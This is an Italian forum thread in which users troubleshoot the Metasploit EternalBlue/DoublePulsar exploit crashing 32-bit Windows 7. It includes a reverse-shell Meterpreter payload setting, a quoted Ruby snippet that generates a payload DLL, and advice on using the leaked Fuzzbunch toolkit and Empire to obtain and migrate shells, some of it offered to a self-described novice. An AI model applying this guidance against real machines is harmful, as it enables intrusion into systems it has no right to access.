Domanda Modulo Eternalblue/Doublepulsar di Metasploit su sistemi a 32 bit

[Cutl4ss]

Dopo aver lanciato l'exploit, la macchina target (Windows7 Ultimate x86) si riavvia improvvisamente visualizzando una schermata blu di errore:

Questo invece è quanto accade sulla macchina attacker:

Ho anche provato a cambiare payload e processo da injectare, ma l'errore si ripete. Qualche idea?

 

[Zeta 3.14]

Perchè a volte viene sovrascritta una parte di memoria del processo con il payload che è considerata kernel side e quindi va in crash. Mi sembra.


Alessandro Nava

 

[Zeta 3.14]

Ma poi il payload hai fatto in modo che non ha null bytes?


Alessandro Nava

 

[Cutl4ss]

Il payload viene settato direttamente dal modulo con il classico:

set PAYLOAD windows/meterpreter/reverse_tcp

Sui sistemi a 64 bit funziona.

 

[Zeta 3.14]

Mmh non è per i 64 bit su win 7? Non sono molto pratico di eternalblue


Alessandro Nava

 

[Cutl4ss]

Exploit target: Windows 7 (all services pack) (x86) (x64). C'è scritto.

 

[Zeta 3.14]

Boh, non ne ho idea allora


Alessandro Nava

 

[ScriptMan]

il problema è nell'exploit stesso: infatti navigando fra le varie versioni di questo exploit su github si possono notare nei codici sorgenti degli appunti dei creatori (in parole povere dopo gli # in python) frasi del tipo "This exploit May cause a crash issue on the target machine" proprio a causa della parte di memoria che si va a sovrascrivere; comunque hai verificato che il computer vittima sia vulnerabile?

 

[Cutl4ss]

Sì, il pc è vulnerabile. Credo che il problema stia nella DLL generata da Metasploit:

#Generate DLL
  print_status("Generating payload DLL for Doublepulsar")
  pay = framework.modules.create(datastore['payload'])
  pay.datastore['LHOST'] = datastore['LHOST']
  dll = pay.generate_simple({'Format'=>'dll'})
  File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
    print_status("Writing DLL in #{dllpayload}")
    f.print dll

Infatti provando con Fuzzbunch ed Empire il problema non si verifica.

 

[ScriptMan]

Sì, il pc è vulnerabile. Credo che il problema stia nella DLL generata da Metasploit:

#Generate DLL
  print_status("Generating payload DLL for Doublepulsar")
  pay = framework.modules.create(datastore['payload'])
  pay.datastore['LHOST'] = datastore['LHOST']
  dll = pay.generate_simple({'Format'=>'dll'})
  File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
    print_status("Writing DLL in #{dllpayload}")
    f.print dll

Infatti provando con Fuzzbunch ed Empire il problema non si verifica.

si è proprio il problema di Eternalblue che a volte fa crashare il target

 

[Zeta 3.14]

Sì, il pc è vulnerabile. Credo che il problema stia nella DLL generata da Metasploit:

#Generate DLL
  print_status("Generating payload DLL for Doublepulsar")
  pay = framework.modules.create(datastore['payload'])
  pay.datastore['LHOST'] = datastore['LHOST']
  dll = pay.generate_simple({'Format'=>'dll'})
  File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
    print_status("Writing DLL in #{dllpayload}")
    f.print dll

Infatti provando con Fuzzbunch ed Empire il problema non si verifica.

Sì, facendo delle ricerche molti si lamentano del fatto che il payload generato da metasploit faccia crashare il pc. L'unica cosa che mi viene in mente è fare una shellcode e poi injectarla tramite lo script in python che trovi su github.

 

[Cutl4ss]

Sì, facendo delle ricerche molti si lamentano del fatto che il payload generato da metasploit faccia crashare il pc

Sì, la DLL caricata da DoublePulsar. Comunque ho "risolto" con Fuzzbunch ed Empire. Una volta ricevuta la shell, setto un listener da Metasploit e tramite il modulo "code_execution" di Empire migro a una shell Meterpreter.

 

[GoatSeller]

Per caso potreste passarmi i file dell Eternalblue? (o sono quelli di github?)

 

[ScriptMan]

Per caso potreste passarmi i file dell Eternalblue? (o sono quelli di github?)

è l'intero fuzzbunch su github https://github.com/fuzzbunch/fuzzbunch basta avviarlo con python 2.7 su un sistema a 32 bit possibilmente

 

[GoatSeller]

Grazie mille, per caso mi puoi spiegare come utilizzarlo?

 

[Cutl4ss]

Grazie mille, per caso mi puoi spiegare come utilizzarlo?

Installi Fuzzbunch, selezioni l'exploit e prepari il payload

 

[GoatSeller]

Scusami, sono poco esperto di linux e exploit, di solito mi dedico a reverse enginnering.
Come seleziono l exploit e come preparo il payload?

 

[ScriptMan]

Grazie mille, per caso mi puoi spiegare come utilizzarlo?

è molto semplice e intuitivo ti allego anche una guida youtube; fuzzbunch è come se fosse una GUI dove selezionare l'exploit e poi in base all'exploit che selezioni il funzionamento è diverso e ovviamente i non li so usare al 100% tutti comunque se anche questa spiegazione non ti ha soddisfatto ecco un piccolo video youtube che ti può aiutare:

 

[GoatSeller]

Grazie mille

 

[ScriptMan]

Grazie mille

di nulla

 

[Cutl4ss]

Scusami, sono poco esperto di linux e exploit, di solito mi dedico a reverse enginnering.

Fuzzbunch è un framework per Windows, tipo Metasploit. Puoi installarlo anche su Kali, ma ti serve wine32

 

[Яǝʌǝɹsǝ]

più semplice di cosi..

 

[GoatSeller]

Il problema è che ho un sistema x64 e non x32

 

[Cutl4ss]

Il problema è che ho un sistema x64 e non x32

Non fa niente. A te serve Python 2.6 32bit e pywin32-212.

 

[GoatSeller]

Python 2.6 32bit e pywin32-221. puoi passarmi un link per tutti e due per scaricarli? se puoi